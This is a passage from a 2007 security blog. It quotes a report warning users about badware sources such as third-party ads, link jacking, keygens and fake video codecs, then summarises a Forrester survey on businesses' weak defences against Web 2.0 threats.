"Many providers of ads and other remotely hosted content take steps to ensure their products are safe. If you're a Web site owner considering using third party content, carefully research providers before placing their content on your site. Often other Internet users and encrypted code appears as unintelligible text, symbols and numbers. Webmasters will have information about problematic ad networks and other third party offerings. Choosing to use third party content means inviting someone else to have control over part of your Web site, and entrusting them with the security of the content they send to your site. Choose carefully, and stay vigilant, to help keep your site secure."

On themed attacks:

"These attacks aren't confined to holidays and other calendar events.. Another reason for a sudden jump in the number of visitors to a site is a link to that site from a prominent source such as a popular blog or news site. In one incident, a site that was linked to from the popular blog BoingBoing was then compromised, a maneuver colloquially known as 'link jacking.' While BoingBoing edited its post as soon as the attack was discovered, the link drew a huge amount of traffic to the compromised site, leading to an unknown number of badware infections."

On zero day threats:

"Exploits can be created quite rapidly, much quicker than software companies can get the word out to all their users about an important new security patch. Many small Web site owners are not aware of the urgency and importance of updating Web content management software they use, and allow their sites to go months, even years, without updated software."

On serial key generators:

"Using key generators is a little like playing roulette. They can install keyloggers that will record every keystroke you type on your machine and send your passwords and personal information to third parties. Again, having up to date protection may not keep you from becoming infected. "

On porn codecs:

"Web sites that contain pornographic material may instruct you to download a plug-in codec to watch online videos. These can be false codecs that open up your computer's system to harmful software. Fake video codec sites often center on pornography, but these tactics could easily be used by any type of Web site. "

On networking sites:

"Many features of social networking sites create easy opportunities for unscrupulous individuals to attempt to exploit your trust. Badware on these sites can be delivered through advertising, global and private messages and other means. A favorite method used by badware distributors is sending messages and 'friend invites' from fake profiles."

All in all it's a very detailed report and I'd recommend it to anyone who is trying to help educate a user community about all the security issues they need to consider in their daily travels around the Web.

Posted by Matt Hines on October 2, 2007 02:35 PM

October 01, 2007 | Comments: (0)

Web 2.0 security concerns abound

TAGS: Security

A lack of comprehensive security tools designed to stop Web-based threats continues to be a problem among businesses, according to a new survey published by Forrester Research and Secure Computing on Monday

According to the study -- which was based on interviews conducted by Forrester with roughly 150 IT pros -- companies of all sizes continue to adopt a larger number of Web-based applications, in particular so-called Web 2.0 technologies such as online collaboration and file-sharing tools, yet few have done anything to protect themselves against the growing volume of attacks that seek to piggyback on the systems.

First off, even though most companies (97 percent) consider themselves prepared for malware threats, a majority (79 percent) admit that they are still falling prey to attacks on a "frequent basis," with a relatively large number (68 percent) conceding that they have "room for improvement."

Meanwhile, despite the fact that 96 percent of the organizations questioned said that they see a significant value in adopting Web 2.0 applications, less than 5 percent reported that they have taken any specific security measures to help protect users of the technologies -- many of which are controlled by third parties, such as Facebook or YouTube.

At the same time, companies clearly recognize the potential for Web 2.0 applications to become channels through which they might have sensitive or valuable data walk out the proverbial door. Roughly 92 percent of the respondents said that outbound data leakage prevention (DLP) is a part of their Web-filtering strategy, with 58 percent ranking it as an "extremely important" business concern.

In terms of aligning their defenses, companies seem less responsive. Forrester said that "most" enterprises are still dependent on security tools designed to keep traditional attacks at bay, while few have made the move to begin defending against newer threats.

Looking at related spending, the report finds that 46 percent of those interviewed said that malware remediation cost them over $25,000 in the last fiscal year.

Overall, only 33 percent of those interviewed for the study said that they have data leakage prevention capabilities in place today, while 57 percent of those surveyed indicated a belief that restricting access to social networking and rich media sites could "visibly increase" employee productivity.

So, it would seem that everyone agrees that user-driven technologies are very valuable in some way, yet few are doing anything to protect themselves against their use. Forrester said that this trend shows a "noticeable discrepancy" between how well prepared businesses perceive themselves to be, and how vulnerable they may really be.

"We have found that most companies that have implemented any kind of Web protection have only installed URL filtering and signature scanning," Chenxi Wang, a Forrester researcher involved with the study said in a report summary. "Malware writers are now using the Web as a primary vehicle to propagate a plethora of new threats undeterred by traditional security means. The need for more effective Web protection has never been greater."

Among the recommendations offered to companies in the report to help close the apparent gap:

-Employ new technologies that do a better job handling Web 2.0 threats, including reputation services, blended attack protection, behavior-monitoring tools, outbound content control systems and applications-usage controls.

-Re-examine security policies to account for new threats and employ additional training measures to get the word out on the attacks.

"Companies really need to adjust their policies for the Web 2.0 world in general, Internet use policies should include social Web sites, blogs, and the other varieties, and this has to be spelled out specifically," said Paul Henry, Secure Computing's vice president of technology evangelism. "Beyond that, these companies simply need stronger technical safeguards; a lot are barely protecting against the initial generations of Web-based threats that we've seen."

Posted by Matt Hines on October 1, 2007 10:11 AM